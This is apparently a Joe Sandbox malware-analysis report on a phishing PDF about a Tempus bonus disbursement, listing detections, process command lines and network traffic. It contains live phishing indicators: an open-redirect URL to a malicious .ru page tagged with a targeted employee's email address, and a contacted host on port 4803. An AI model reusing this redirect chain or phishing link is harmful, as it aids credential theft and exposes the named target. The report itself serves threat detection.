Edit tour

Windows Analysis Report
Review Tempus wages bonus For 2025 Compensation Disbursement.pdf

Overview

General Information

Sample name:Review Tempus wages bonus For 2025 Compensation Disbursement.pdf
Analysis ID:1629440
MD5:810621f02bc6f5704279e6f3fad07042
SHA1:cb2a888e2721b7306fffae969b357eb8cb39535f
SHA256:ecfacb0313c4817124af7722af1d39b9df92321148f11523ada6cb9903f28a70
Infos:

Detection

HTMLPhisher, Invisible JS
Score:84
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
HTML page contains hidden javascript code
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • Acrobat.exe (PID: 4132 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Review Tempus wages bonus For 2025 Compensation Disbursement.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 5560 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 3196 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1728,i,2651444395611178824,4872869830403075443,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ronl.org/redirect?url=https://1C.hypernesdt.ru/A86bjH/#Xesmeralda.arriaga@tempus.com MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 7756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2652 --field-trial-handle=2604,i,702203083375713400,12249269372178961096,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 8936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "http://mailto:digit@nelsoncourt.us" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 9112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2004,i,10258909886674376050,18371129370388586729,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_273JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    0.1.id.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      0.1.id.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
        1.1.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          1.1.pages.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
            1.0.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://1c.hypernesdt.ru/A86bjH/Avira URL Cloud: Label: malware

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_273, type: DROPPED
              Source: Yara matchFile source: 0.1.id.script.csv, type: HTML
              Source: Yara matchFile source: 1.1.pages.csv, type: HTML
              Source: Yara matchFile source: 1.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.id.script.csv, type: HTML
              Source: Yara matchFile source: 1.1.pages.csv, type: HTML
              Source: Yara matchFile source: 1.0.pages.csv, type: HTML
              Source: PDF documentJoe Sandbox AI: PDF document contains QR code
              Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://1c.hypernesdt.ru/A86bjH/#Xesmeralda.arriag... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` to decode base64-encoded strings, followed by `eval()` to execute the decoded content, poses a significant security risk. Additionally, the script appears to be sending user data to an untrusted domain, which is a clear indicator of malicious intent. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
              Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://1c.hypernesdt.ru/A86bjH/#Xesmeralda.arriag... This script demonstrates high-risk behaviors, including dynamic code execution through the use of `eval()` and potential data exfiltration. The obfuscated code and encoded strings further increase the risk. Overall, this script exhibits a high level of malicious intent and should be treated with caution.
              Source: https://1c.hypernesdt.ru/A86bjH/#Xesmeralda.arriaga@tempus.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>AI UI Template</title> <style> body { font-family: 'Segoe UI', Tahoma, Geneva,...
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49868 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49868 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50037 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50041 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50045 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50050 version: TLS 1.2

              Networking

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 4803
              Source: global trafficTCP traffic: 192.168.2.6:49869 -> 74.7.84.190:4803
              Source: global trafficTCP traffic: 192.168.2.6:49829 -> 1.1.1.1:53
              Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
              Source: Joe Sandbox ViewIP Address: 15.197.142.173 15.197.142.173
              Source: Joe Sandbox ViewIP Address: 15.197.142.173 15.197.142.173
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
              Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
              Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
              Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
              Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
              Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
              Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
              Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
              Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
              Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: unknownTCP traffic detected without corresponding DNS query: 74.7.84.190
              Source: global trafficHTTP traffic detected: GET /redirect?url=https://1C.hypernesdt.ru/A86bjH/ HTTP/1.1Host: ronl.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /A86bjH/ HTTP/1.1Host: 1c.hypernesdt.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1c.hypernesdt.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1c.hypernesdt.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1c.hypernesdt.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1c.hypernesdt.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1c.hypernesdt.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=VZV49D3W6wQC1rCj8snQ3H0ipeFWSkR5aq5oyjEKZQo-1741109112-1.0.1.1-NRrKqpZTiKKQzGc.gJms_lY6KGAV_.oys1ECr1fzqtZKSExV3j0nCAcgUga2c5j3OE2KL3VYHXyaDPQdcpukmgrvyuMyl7zk1GKSK9oE0xE
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: x1.i.lencr.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: nelsoncourt.usConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: nelsoncourt.usConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /NelsonCourt HTTP/1.1Host: 74.7.84.190:4803Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /NelsonCourt HTTP/1.1Host: 74.7.84.190:4803Connection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /NelsonCourt HTTP/1.1Host: 74.7.84.190:4803Connection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /NelsonCourt HTTP/1.1Host: 74.7.84.190:4803Connection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /NelsonCourt HTTP/1.1Host: 74.7.84.190:4803Connection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /NelsonCourt HTTP/1.1Host: 74.7.84.190:4803Connection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /NelsonCourt HTTP/1.1Host: 74.7.84.190:4803Connection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /NelsonCourt HTTP/1.1Host: 74.7.84.190:4803Connection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficDNS traffic detected: DNS query: ronl.org
              Source: global trafficDNS traffic detected: DNS query: 1c.hypernesdt.ru
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
              Source: global trafficDNS traffic detected: DNS query: nelsoncourt.us
              Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.drString found in binary or memory: http://x1.i.lencr.org/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
              Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49868 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49868 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50037 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50041 version: TLS 1.2
